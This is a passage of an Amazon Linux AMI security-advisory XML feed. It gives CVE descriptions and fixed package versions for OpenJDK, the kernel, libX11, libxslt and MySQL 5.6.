Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1889697: CVE-2020-14796 OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680)
CVE-2020-14792:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N).
1889280: CVE-2020-14792 OpenJDK: Integer overflow leading to out-of-bounds access (Hotspot, 8241114)
CVE-2020-14782:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
1889290: CVE-2020-14782 OpenJDK: Certificate blacklist bypass via alternate certificate encodings (Libraries, 8237995)
CVE-2020-14781:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).
1889274: CVE-2020-14781 OpenJDK: Credentials sent over unencrypted LDAP connection (JNDI, 8237990)
CVE-2020-14779:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1889271: CVE-2020-14779 OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization, 8236862)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14779" title="" id="CVE-2020-14779" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14781" title="" id="CVE-2020-14781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14782" title="" id="CVE-2020-14782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14792" title="" id="CVE-2020-14792" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14796" title="" id="CVE-2020-14796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14797" title="" id="CVE-2020-14797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14803" title="" id="CVE-2020-14803" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.56.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.56.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1461</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1461: medium priority package update for kernel</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8694:
A flaw was found in the Linux kernel's implementation of Intel's Running Average Power Limit (RAPL) implementation. A local attacker could infer secrets by measuring power usage and also infer private data by observing the power usage of calculations performed on the data.
1828580: CVE-2020-8694 kernel: Insufficient access control vulnerability in PowerCap Framework
CVE-2020-28974:
An out-of-bounds (OOB) SLAB memory access flaw was found in the Linux kernel's fbcon driver module. A bounds check failure allows a local attacker with special user privileges to gain access to out-of-bounds memory, leading to a system crash or leaking of internal kernel information. The highest threat from this vulnerability is to system availability.
A slab-out-of-bounds read in fbcon in the Linux kernel before 5.9.7 could be used by local attackers to read privileged information or potentially crash the kernel, aka CID-3c4e0dff2095. This occurs because KD_FONT_OP_COPY in drivers/tty/vt/vt.c can be used for manipulations such as font height.
1903126: CVE-2020-28974 kernel: slab-out-of-bounds read in fbcon
CVE-2020-28941:
An issue was discovered in drivers/accessibility/speakup/spk_ttyio.c in the Linux kernel through 5.9.9. Local attackers on systems with the speakup driver could cause a local denial of service attack, aka CID-d41227544427. This occurs because of an invalid free when the line discipline is used more than once.
99999:
CVE-2020-28941 kernel: NULL pointer dereference in spk_ttyio_ldisc_close function in drivers/accessibility/speakup/spk_ttyio.c
CVE-2020-27777:
No description is available for this CVE.
A flaw was found in the way RTAS handled memory accesses in userspace to kernel communication. On a locked down (usually due to Secure Boot) guest system running on top of PowerVM or KVM hypervisors (pseries platform) a root like local user could use this flaw to further increase their privileges to that of a running kernel.
1900844: CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity
CVE-2020-27675:
An issue was discovered in the Linux kernel through 5.9.1, as used with Xen through 4.14.x. drivers/xen/events/events_base.c allows event-channel removal during the event-handling loop (a race condition). This can cause a use-after-free or NULL pointer dereference, as demonstrated by a dom0 crash via events for an in-reconfiguration paravirtualized device, aka CID-073d0552ead5.
99999:
CVE-2020-27675 kernel: xen: race condition in event-channel removal during the event-handling loop (XSA-331)
CVE-2020-27673:
An issue was discovered in the Linux kernel through 5.9.1, as used with Xen through 4.14.x. Guest OS users can cause a denial of service (host OS hang) via a high rate of events to dom0, aka CID-e99502f76271.
99999:
CVE-2020-27673 kernel: xen: guest OS users can cause a DoS via a high rate of events to dom0 (XSA-332)
CVE-2020-25704:
A flaw memory leak in the Linux kernel performance monitoring subsystem was found in the way if using PERF_EVENT_IOC_SET_FILTER. A local user could use this flaw to starve the resources causing denial of service.
1895961: CVE-2020-25704 kernel: perf_event_parse_addr_filter memory
CVE-2020-25669:
No description is available for this CVE.
1892176: CVE-2020-25669 kernel: use-after-free read in sunkbd_reinit in drivers/input/keyboard/sunkbd.c
CVE-2020-25668:
No description is available for this CVE.
1893287: CVE-2020-25668 kernel: race condition in fg_console can lead to use-after-free in con_font_op
CVE-2020-25656:
A flaw was found in the Linux kernel. A use-after-free was found in the way the console subsystem was using ioctls KDGKBSENT and KDSKBSENT. A local user could use this flaw to get read memory access out of bounds. The highest threat from this vulnerability is to data confidentiality.
1888726: CVE-2020-25656 kernel: use-after-free in read in vt_do_kdgkb_ioctl
CVE-2020-14351:
A flaw was found in the Linux kernel. A use-after-free memory flaw was found in the perf subsystem allowing a local attacker with permission to monitor perf events to corrupt memory and possibly escalate privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1862849: CVE-2020-14351 kernel: performance counters race condition use-after-free
CVE-2019-19770:
A use-after-free flaw was found in the debugfs_remove function in the Linux kernel. The flaw could allow a local attacker with special user (or root) privilege to crash the system at the time of file or directory removal. This vulnerability can lead to a kernel information leak. The highest threat from this vulnerability is to system availability.
1786179: CVE-2019-19770 kernel: use-after-free in debugfs_remove in fs/debugfs/inode.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19770" title="" id="CVE-2019-19770" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14351" title="" id="CVE-2020-14351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25656" title="" id="CVE-2020-25656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25668" title="" id="CVE-2020-25668" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25669" title="" id="CVE-2020-25669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25704" title="" id="CVE-2020-25704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27673" title="" id="CVE-2020-27673" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27675" title="" id="CVE-2020-27675" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27777" title="" id="CVE-2020-27777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28941" title="" id="CVE-2020-28941" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28974" title="" id="CVE-2020-28974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8694" title="" id="CVE-2020-8694" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.209-117.337.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1462</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1462: important priority package update for libX11</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14363:
An integer overflow vulnerability leading to a double-free was found in libX11. This flaw allows a local privileged attacker to cause an application compiled with libX11 to crash, or in some cases, result in arbitrary code execution. The highest threat from this flaw is to confidentiality, integrity as well as system availability.
1872473: CVE-2020-14363 libX11: integer overflow leads to double free in locale handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14363" title="" id="CVE-2020-14363" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.13.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.13.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.13.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.13.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.13.amzn1.i686.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.13.amzn1.i686.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.13.amzn1.i686.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1463</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1463: medium priority package update for libxslt</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18197:
In xsltCopyText in transform.c in libxslt 1.1.33, a pointer variable isn't reset under certain circumstances. If the relevant memory area happened to be freed and reused in a certain way, a bounds check could fail and memory outside a buffer could be written to, or uninitialized data could be disclosed.
1770768: CVE-2019-18197 libxslt: use after free in xsltCopyText in transform.c could lead to information disclosure
CVE-2019-11068:
libxslt through 1.1.33 allows bypass of a protection mechanism because callers of xsltCheckRead and xsltCheckWrite permit access even upon receiving a -1 error code. xsltCheckRead can return -1 for a crafted URL that is not actually invalid and is subsequently loaded.
1709697: CVE-2019-11068 libxslt: xsltCheckRead and xsltCheckWrite routines security bypass by crafted URL
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11068" title="" id="CVE-2019-11068" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18197" title="" id="CVE-2019-18197" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxslt" version="1.1.28" release="6.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-1.1.28-6.15.amzn1.x86_64.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.28" release="6.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-debuginfo-1.1.28-6.15.amzn1.x86_64.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="6.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python26-1.1.28-6.15.amzn1.x86_64.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="6.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python27-1.1.28-6.15.amzn1.x86_64.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="6.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-devel-1.1.28-6.15.amzn1.x86_64.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.28" release="6.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-debuginfo-1.1.28-6.15.amzn1.i686.rpm</filename></package><package name="libxslt" version="1.1.28" release="6.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-1.1.28-6.15.amzn1.i686.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="6.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python26-1.1.28-6.15.amzn1.i686.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="6.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-devel-1.1.28-6.15.amzn1.i686.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="6.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python27-1.1.28-6.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1464</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1464: medium priority package update for mysql56</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14793:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1890750: CVE-2020-14793 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2020)
CVE-2020-14769:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1890739: CVE-2020-14769 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2020)
CVE-2020-14765:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1890738: CVE-2020-14765 mysql: Server: FTS unspecified vulnerability (CPU Oct 2020)
CVE-2020-14672:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1890737: CVE-2020-14672 mysql: Server: Stored Procedure unspecified vulnerability (CPU Oct 2020)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14672" title="" id="CVE-2020-14672" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14765" title="" id="CVE-2020-14765" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14769" title="" id="CVE-2020-14769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14793" title="" id="CVE-2020-14793" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-test" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.50" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.50-1.38.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.50" release="1.38.amzn1" epoch="0" 